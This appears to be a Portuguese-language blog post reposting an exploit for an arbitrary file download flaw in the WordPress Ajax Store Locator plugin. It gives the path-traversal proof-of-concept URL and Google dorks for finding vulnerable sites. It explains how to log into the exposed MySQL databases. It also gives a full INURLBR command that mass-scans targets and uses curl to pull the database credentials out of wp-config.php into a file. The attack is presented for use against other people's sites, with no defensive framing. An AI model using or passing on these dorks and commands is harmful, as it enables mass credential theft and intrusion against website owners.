quinta-feira, 22 de janeiro de 2015

WordPress Ajax Store Locator Arbitrary File Download

  • # Exploit Title : WordPress Ajax Store Locator <= 1.2 Arbitrary File Download
  • # Exploit Author : Claudio Viviani
  • # Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
  • # Software Link : Premium
  • # Dork Google: inurl:ajax-store-locator
  • #              index of ajax-store-locator    
  • # Date : 2014-12-06
  • # Tested on : Windows 7 / Mozilla Firefox
  • #             Linux / Mozilla Firefox
  • # PoC Exploit: http://TARGET/wp-content/plugins/ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile]
  • or
  • http://TARGET/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile]
  • "download_file" variable is not sanitized.
  • ################
  • Discovered By : Claudio Viviani
  •                 http://www.homelab.it
  •                 info@homelab.it
  •                 homelabit@protonmail.ch
  •                 https://www.facebook.com/homelabit
  •                 https://twitter.com/homelabit
  •                 https://plus.google.com/+HomelabIt1/
  •                 https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  • ################
More dorks:
  • index of /wp-content/plugins/ajax-store-locator-wordpress/ site:com/uk/org/br/..etc..
Example of config.php
  • define('DB_NAME', 'name_database');
  • /** MySQL database username */
  • define('DB_USER', 'user_database');
  • /** MySQL database password */
  • define('DB_PASSWORD', 'pass_database');
  • /** MySQL hostname */
  • define('DB_HOST', 'adress_database');
Caso em DB_HOST esteje setado como localhost, você pode verificar com os seguintes endereços:
mysql.nome-do-site.com
ou
nome-do-site.com:3306 "caso esse esteje funcionando você tem q usar com um programa de sql
  • ex: HeidiSQL para windows ou no proprio console do linux,
  • ex: mysql --host endereço-do-site.com --user usuario --password='senha'
ou
nome-do-site.com/phpmyadmin
Com essa vulnerabilidade você execulta atravez do navegador, mais isso se torna chato e cansativo, então vamos usar um otimo script pra fazer toda a busca e deixar organizado pra gente
Usando com o srcipt INURLBR para automatização do processo de buscas:
Commando:
  • inurlbr.php --dork 'inurl:"ajax-store-locator" site:com' -q 1,6 -s ~/Desktop/output/wp-out.txt --exploit-get '/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=../../../wp-config.php' -t 3 --exploit-comand '/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=../../../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> ~/Desktop/output/wp-out-curl.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'

WordPress_Ajax_Store_Locator_Arbitrary_file_download from Mathew Thomas on Vimeo.


Marcadores: , ,

1 comentários:

Assinar: Postar comentários (Atom)